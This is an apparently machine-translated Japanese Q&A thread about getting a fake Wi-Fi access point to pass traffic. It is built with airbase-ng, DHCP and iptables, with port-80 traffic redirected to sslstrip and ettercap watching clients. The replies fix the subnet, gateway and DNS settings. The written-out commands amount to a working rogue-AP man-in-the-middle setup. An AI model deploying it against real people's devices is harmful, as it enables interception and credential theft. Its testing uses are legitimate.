web-dev-qa-db-ja.com

偽のAPクライアントのためのインターネット

私はテスト目的で偽のAPをセットアップしようとしています。 airbase-ngを正常に機能させ、クライアントがIPアドレスを取得するためのDHCPサーバーをセットアップすることができました。これはすべて機能します。私のラップトップには、AP用の外部wifiカードとインターネット用の内部wifiカードがあります。ただし、APを起動すると、ラップトップにモニターモードではない2番目のwifiカードがある場合でも、クライアント(私の電話)はWebブラウザー検索を実行できず、ラップトップも実行できません。

これが私の設定です:

Sudo ifconfig wlan1 down
Sudo ifconfig wlan1 up
Sudo airbase-ng -c 11 -e ANET wlan1



Sudo ifconfig at0 192.168.1.1 netmask 255.255.255.0
Sudo ifconfig at0 mtu 1800
Sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Sudo iptables -P FORWARD ACCEPT
Sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
Sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
Sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
Sudo /etc/init.d/isc-dhcp-server start

ip_forwardingが有効になっています。

これはチュートリアルからです。次に、sslstripとettercapを実行します。

これは私のDHCPサブネット構成です

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0{
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "ANET";
option domain-name-servers 192.168.1.170;
range 192.168.1.2 192.168.1.40;
}

Dhcpdコマンドは次のように応答します。

Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 wlan1
Multiple interfaces match the same shared network: wlan0 wlan1
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0
Multiple interfaces match the same subnet: wlan0 at0
Multiple interfaces match the same shared network: wlan0 at0

ettercapは、クライアントからのDHCP要求とACKを表示します。

DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] OFFER : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [C0:BD:D1:15:2B:64] REQUEST 192.168.1.2
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"
DHCP: [192.168.1.1] ACK : 192.168.1.2 255.255.255.0 GW 192.168.1.1 DNS 192.168.1.1 "ANET"

Wlan0の私のIPアドレスは192.168.1.170です。

編集:

DHCP構成:

        Authoritative;
    Default-lease-time 600;
    Max-lease-time 7200;
    Subnet 192.168.2.0 netmask 255.255.255.0{
    option routers 192.168.2.1;
    option subnet-mask 255.255.255.0;
    option domain-name "ANET";
    option domain-name-servers 192.168.1.170;
    range 192.168.2.2 192.168.2.40;
}

Iptables:

Sudo ifconfig at0 192.168.2.1 netmask 255.255.255.0
Sudo ifconfig at0 mtu 1800
Sudo route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
Sudo iptables -P FORWARD ACCEPT
Sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
Sudo iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
Sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Sudo dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
Sudo /etc/init.d/isc-dhcp-server start
Sudo sslstrip -f -p -k 10000
1
dylan7

これまでに2つの問題を文書化しました。

  1. ラップトップの両側に同じIPサブネットがあります。あなたのラップトップはNATゲートウェイとして機能します。これはステロイドのIPルーターのようなものです。IPルーターは両側に異なるサブネットを持っている必要があります。そうでないと、ルーティング方法がわかりません。

  2. ラップトップをDNSサーバーとして使用するようにsoftAPのクライアントに指示するようにDHCPサーバーを構成しましたが、ラップトップはDNSサーバーまたはプロキシとして機能するように構成されていません。

これは、softAPクライアントのサブネットを192.168.2.0/24に変更することで修正できますが、DHCPサーバープロセスは、DNSサーバーとして192.168.1.1を使用するようにクライアントに指示し続けます。そうすれば、DNS要求はラップトップを経由してNATアップストリームNATゲートウェイに送られ、おそらくDNSプロキシサービスが実行されています。

2
Spiff

これを修正するには。私はSpiffの答えに従い、最終的にそれを機能させる他のいくつかのことを試みました。

1)Spiffが言ったように、DHCP構成ファイルのIPサブネットを192.168.2.0/24に変更しました。

2)iptablesのゲートウェイとDHCP構成ファイルのoption routersを192.168.2.1に作成しました

3)最後の部分:DHCP構成ファイルでDNSをGoogleの8.8.8.8に変更しました。私のAPがDNSとして使用する機能をブロックしている可能性があります...推測です

0
dylan7